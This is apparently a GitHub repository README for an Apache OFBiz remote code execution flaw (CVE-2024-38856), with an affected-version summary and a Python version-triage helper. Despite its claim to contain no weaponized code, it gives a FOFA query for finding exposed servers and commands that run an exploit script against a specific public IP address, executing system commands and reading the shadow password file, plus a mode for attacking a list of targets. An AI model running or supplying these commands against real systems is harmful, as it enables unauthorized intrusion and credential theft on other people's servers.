CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit

# CVE-2024-38856 — Apache OFBiz (Repository documentation)
> **Repository purpose:** informational documentation about CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE).
> This repository **does not** contain weaponized exploit code. It is intended for defensive research, patching guidance, detection, and safe lab testing only.
---
## Overview
**CVE-2024-38856** is an incorrect-authorization vulnerability in Apache OFBiz. It may allow unauthenticated access to certain endpoints and, under specific conditions, the execution of screen-rendering code, which can lead to remote code execution on affected systems. The issue was fixed in Apache OFBiz **18.12.15**; earlier releases up to and including **18.12.14** are affected.

**Severity / Impact:** multiple security vendors and researchers rate this vulnerability as critical: it can lead to unauthenticated remote code execution on vulnerable instances, and exploitation attempts have been observed in the wild. Administrators should treat exposed OFBiz instances as high-priority remediation items.
---
## Affected versions
- Apache OFBiz: **through 18.12.14** (i.e., all releases <= 18.12.14 are considered vulnerable). The issue was addressed in **18.12.15**; upgrading is recommended.
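For triaging an inventory of OFBiz hosts against the affected range above, here is an added example (not part of this repository's code) that parses release strings and flags anything below the fixed 18.12.15 release; the `triage` helper and the inventory format are assumptions for illustration, and pre-release suffixes are ignored.

```python
import re
from typing import Dict, Optional, Tuple

# First release that fixes CVE-2024-38856, per the Apache advisory.
FIXED_VERSION: Tuple[int, int, int] = (18, 12, 15)


def parse_version(version: str) -> Optional[Tuple[int, ...]]:
    """Turn an OFBiz release string such as '18.12.14' into a comparable tuple.

    Returns None when the string does not start with dotted integers, so the
    caller can report 'unknown' instead of silently treating it as patched.
    """
    match = re.match(r"^\s*(\d+(?:\.\d+)*)", version)
    if not match:
        return None
    parts = tuple(int(p) for p in match.group(1).split("."))
    # Pad short strings so '18.12' compares like '18.12.0'.
    if len(parts) < 3:
        parts = parts + (0,) * (3 - len(parts))
    return parts


def is_affected(version: str) -> Optional[bool]:
    """True for releases <= 18.12.14, False from 18.12.15 on, None if unparseable."""
    parsed = parse_version(version)
    if parsed is None:
        return None
    return parsed < FIXED_VERSION


def triage(inventory: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Split a {host: version} inventory (constructed format, assumption)
    into hosts needing the 18.12.15 upgrade and hosts with unknown versions."""
    result: Dict[str, Dict[str, str]] = {"affected": {}, "unknown": {}}
    for host, version in inventory.items():
        verdict = is_affected(version)
        if verdict is None:
            result["unknown"][host] = version
        elif verdict:
            result["affected"][host] = version
    return result


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {"erp-1": "18.12.14", "erp-2": "18.12.15", "erp-3": "17.12.10", "erp-4": "n/a"}
    print(triage(sample))
```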
### FOFA query

```
app="Apache_OFBiz" && port="8443"
```
<img width="1916" height="956" alt="Screenshot 2025-10-10 183057" src="https://github.com/user-attachments/assets/f16df50d-168f-467c-8b90-2e114d66d59d" />
## Exploit

```
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git
cd CVE-2024-38856-Apache-OFBiz
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
```
<img width="1478" height="745" alt="Screenshot 2025-10-10 184101" src="https://github.com/user-attachments/assets/87b05f89-3098-4a05-b30f-2e35713f4069" />
```
python3 apache_bang.py --file target.txt -c "ls"
```
<img width="1465" height="739" alt="Screenshot 2025-10-10 075018" src="https://github.com/user-attachments/assets/26b47ec5-ea76-4011-beda-ab6ccf38ced0" />